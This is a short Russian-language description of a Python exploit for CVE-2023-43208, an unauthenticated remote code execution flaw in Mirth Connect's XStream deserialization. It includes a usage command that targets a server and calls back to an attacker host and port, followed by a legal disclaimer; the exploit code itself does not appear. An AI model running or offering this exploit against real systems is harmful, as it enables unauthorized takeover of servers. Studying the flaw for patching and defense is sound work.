
Python-реализация CVE-2023-43208 Mirth Connect RCE (Unauth XStream)
Данный эксплойт использует критическую уязвимость десериализации в движке XStream в составе Mirth Connect. Она возникает из-за неполного исправления для CVE-2023-37679, что позволяет неаутентифицированное произвольное выполнение кода во всех версиях до 4.4.1.
python3 mirth_rce.py https://{target} <attacker_host> <attacker_port>
Данный эксплойт-скрипт предназначен строго для образовательных целей и авторизованного аудита безопасности, чтобы помочь специалистам по защите в устранении CVE-2023-43208; любое использование этого инструмента против несанкционированных целей является незаконным и полностью ложится на конечного пользователя. Автор предоставляет данное программное обеспечение «как есть» без каких-либо гарантий, снимает с себя всю ответственность за возможное неправомерное использование или ущерб и не одобряет и не поощряет несанкционированную деятельность. Используйте на свой страх и риск и только в соответствии с действующим законодательством.